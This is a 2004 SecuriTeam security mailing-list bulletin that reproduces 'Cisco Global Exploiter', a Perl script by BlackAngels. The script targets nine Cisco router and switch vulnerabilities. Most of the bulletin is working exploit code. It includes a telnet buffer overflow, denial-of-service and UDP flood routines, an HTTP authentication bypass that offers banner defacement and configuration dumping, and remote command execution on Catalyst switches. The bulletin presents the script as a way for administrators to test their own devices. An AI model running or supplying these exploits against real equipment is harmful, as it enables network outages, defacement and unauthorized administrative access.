[EXPL] Multiple Cisco Exploit Codes
Date: 25 Mar 2004 16:33:38 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Subject: [EXPL] Multiple Cisco Exploit Codes
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Cisco Exploit Codes
------------------------------------------------------------------------
SUMMARY
The below exploit code provides allows a system administrator to test his
Cisco routers and switches for the following security vulnerabilities:
* Cisco 677/678 Telnet Buffer Overflow Vulnerability
* Cisco IOS Router Denial of Service Vulnerability
* Cisco IOS HTTP Auth Vulnerability
* Cisco IOS HTTP Configuration Arbitrary Administrative Access
Vulnerability
* Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
* Cisco 675 Web Administration Denial of Service Vulnerability
* Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
* Cisco IOS Software HTTP Request Denial of Service Vulnerability
* Cisco 514 UDP Flood Denial of Service Vulnerability
DETAILS
Exploit:
#!/usr/bin/perl
# ########### ##### ############ ########### ##### #####
# # ## # ## # ## # ## # ## # #
# # ### ## # ## # #### ## # ####### # ### #
# # ## # ## # ## # # # #
# # ### ## # ######## # ###### ## # ####### # ### #
# # ## # ## # # # ## # ## # ## # #
# ########### ########### #### #### ########### ##### #####
#
# ############ ##### ##### ############ ############ ##### ###########
# # ## # # # ## # ## # ## # ## # ##
# # #### ## # # # ## # ######## # ##### # ## # ########
# # ## # ## ## # # ##### # ### # ## # ##
# # ###### ## # # # ## # ##### # # ##### # ######## ####### ##
# # # # ## # ## ## # ## # ## # ## # ##
# #### #### ##### ###### ############ ############ ########### ###########
#
#
# [ Cisco Global Exploiter ]
#
# { http://www.BlackAngels.it }
#
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities for an incorrect
# or illegal use of this software or for eventual damages to others
systems.
############
# Modules ##
############
use Socket;
use IO::Socket;
#########
# Main ##
#########
$host = "";
$expvuln = "";
$host = @ARGV[ 1 ];
$expvuln = @ARGV[ 3 ];
if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
}
elsif ($expvuln eq "2") {
cisco2();
}
elsif ($expvuln eq "3") {
cisco3();
}
elsif ($expvuln eq "4") {
cisco4();
}
elsif ($expvuln eq "5") {
cisco5();
}
elsif ($expvuln eq "6") {
cisco6();
}
elsif ($expvuln eq "7") {
cisco7();
}
elsif ($expvuln eq "8") {
cisco8();
}
elsif ($expvuln eq "9") {
cisco9();
}
else {
printf "\nInvalid vulnerability number ...\n\n";
exit(1);
}
##############
# Functions ##
##############
sub usage
{
printf "\nUsage :\n";
printf "perl cge.pl -h <host> -v <vulnerability number>\n\n";
printf "Vulnerabilities list :\n";
printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n";
printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n";
printf "[3] - Cisco IOS HTTP Auth Vulnerability\n";
printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative
Access Vulnerability\n";
printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service
Vulnerability\n";
printf "[6] - Cisco 675 Web Administration Denial of Service
Vulnerability\n";
printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command
Vulnerability\n";
printf "[8] - Cisco IOS Software HTTP Request Denial of Service
Vulnerability\n";
printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n\n";
exit(1);
}
sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
my $serv = $host;
my $dch = "?????????????????a~ %%%%%XX%%%%%";
my $num = 30000;
my $string .= $dch x $num;
my $shc="\015\012";
my $sockd = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $serv,
PeerPort => "(23)",
) || die("No telnet server detected
on $serv ...\n\n");
$sockd->autoflush(1);
print $sockd "$string". $shc;
while (<$sockd>){ print }
print("\nPacket sent ...\n");
sleep(1);
print("Now checking server's status ...\n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $serv,
PeerPort => "(23)",
) || die("Vulnerability successful
exploited. Target server is down ...\n\n");
print("Vulnerability unsuccessful exploited. Target server is still up
..\n\n");
exit(1);
}
sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
my $serv = $host;
my $sockd = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "No http server
detected on $serv ...\n\n"};
$sockd->autoflush(1);
print $sockd "GET /\%\% HTTP/1.0\n\n";
-close $sockd;
print "Packet sent ...\n";
sleep(1);
print("Now checking server's status ...\n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "Vulnerability
successful exploited. Target server is down ...\n\n"};
print("Vulnerability unsuccessful exploited. Target server is still up
..\n\n");
exit(1);
}
sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
my $serv= $host;
my $n=16;
my $port=80;
my $target = inet_aton($serv);
my $fg = 0;
LAB: while ($n<100) {
my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n");
foreach $line (@results){
$line=~ tr/A-Z/a-z/;
if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;}
if ($line =~ /http\/1\.0 200 ok/) {$fg=0;}
}
if ($fg==1) {
sleep(2);
print "Vulnerability unsuccessful exploited with $n
..\n\n\r";
}
else {
sleep(2);
print "Vulnerability successful exploited with $n ...\n\n\r";
last LAB;
}
$n++;
sub exploit {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Unable to initialize socket ...\n\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S);
$|=1;
print $pstr;
while(<S>){
push @in, $_;}
select(STDOUT); close(S); return @in;
}
else { die("No http server detected on $serv ...\n\n"); }
}
}
exit(1);
}
sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access
Vulnerability
{
my $serv = $host;
my $n = 16;
while ($n <100) {
exploit1("GET /level/$n/exec/- HTTP/1.0\n\n");
$wr =~ s/\n//g;
if ($wr =~ /200 ok/) {
while(1)
{ print "\nVulnerability
could be successful exploited. Please choose a type of attack :\n";
print "[1] Banner
change\n";
print "[2] List vty 0 4
acl info\n";
print "[3] Other\n";
print "Enter a valid
option [ 1 - 2 - 3 ] : ";
$vuln = <STDIN>;
chomp($vuln);
if ($vuln == 1) {
print "\nEnter deface line : ";
$vuln = <STDIN>;
chomp($vuln);
exploit1("GET
/level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n");
}
elsif ($vuln == 2) {
exploit1("GET
/level/$n/exec/show%20conf HTTP/1.0\n\n");
print "$wrf";
}
elsif ($vuln == 3)
{ print "\nEnter attack URL : ";
$vuln = <STDIN>;
chomp($vuln);
exploit1("GET /$vuln
HTTP/1.0\n\n");
print "$wrf";
}
}
}
$wr = "";
$n++;
}
die "Vulnerability unsuccessful exploited ...\n\n";
sub exploit1 {
my $sockd = IO::Socket::INET -> new (
Proto => 'tcp',
PeerAddr => $serv,
PeerPort => 80,
Type => SOCK_STREAM,
Timeout => 5);
unless($sockd){die
"No http server detected on $serv ...\n\n"}
$sockd->autoflush(1);
$sockd -> send($_[0]);
while(<$sockd>){$wr .= $_} $wrf = $wr;
close $sockd;
}
exit(1);
}
sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service
Vulnerability
{
my $serv = $host;
my $port = 22;
my $vuln = "a%a%a%a%a%a%a%";
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No ssh server detected on
$serv ...\n\n";
print "Packet sent ...\n";
print $sockd "$vuln";
close($sockd);
exit(1);
}
sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET ? HTTP/1.0\n\n";
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on
$serv ...\n\n";
print "Packet sent ...\n";
print $sockd "$vuln";
sleep(2);
print "\nServer response :\n\n";
close($sockd);
exit(1);
}
sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
my $serv = $host;
my $port = 80;
my $k = "";
print "Enter a file to read [ /show/config/cr set as default ] : ";
$k = <STDIN>;
chomp ($k);
if ($k eq "")
{$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";}
else
{$vuln = "GET /exec$k HTTP/1.0\n\n";}
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on
$serv ...\n\n";
print "Packet sent ...\n";
print $sockd "$vuln";
sleep(2);
print "\nServer response :\n\n";
while (<$sockd>){print}
close($sockd);
exit(1);
}
sub cisco8 # Cisco IOS Software HTTP Request Denial of Service
Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET /error?/ HTTP/1.0\n\n";
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on
$serv ...\n\n";
print "Packet sent ...\n";
print $sockd "$vuln";
sleep(2);
print "\nServer response :\n\n";
while (<$sockd>){print}
close($sockd);
exit(1);
}
sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
my $ip = $host;
my $port = "514";
my $ports = "";
my $size = "";
my $i = "";
print "Input packets size : ";
$size = <STDIN>;
chomp($size);
socket(SS, PF_INET, SOCK_DGRAM, 17);
my $iaddr = inet_aton("$ip");
for ($i=0; $i<10000; $i++)
{send(SS, 0, $size, sockaddr_in($port, $iaddr));}
printf "\nPackets sent ...\n";
sleep(2);
printf "Please enter a server's open port : ";
$ports = <STDIN>;
chomp $ports;
printf "\nNow checking server status ...\n";
sleep(2);
socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error
occuring while loading socket ...\n\n";
my $dest = sockaddr_in ($ports, inet_aton($ip));
connect (SO, $dest) || die "Vulnerability successful exploited. Target
server is down ...\n\n";
printf "Vulnerability unsuccessful exploited. Target server is still up
..\n\n";
exit(1);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:staff@blackangels.it.>
BlackAngels Staff.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
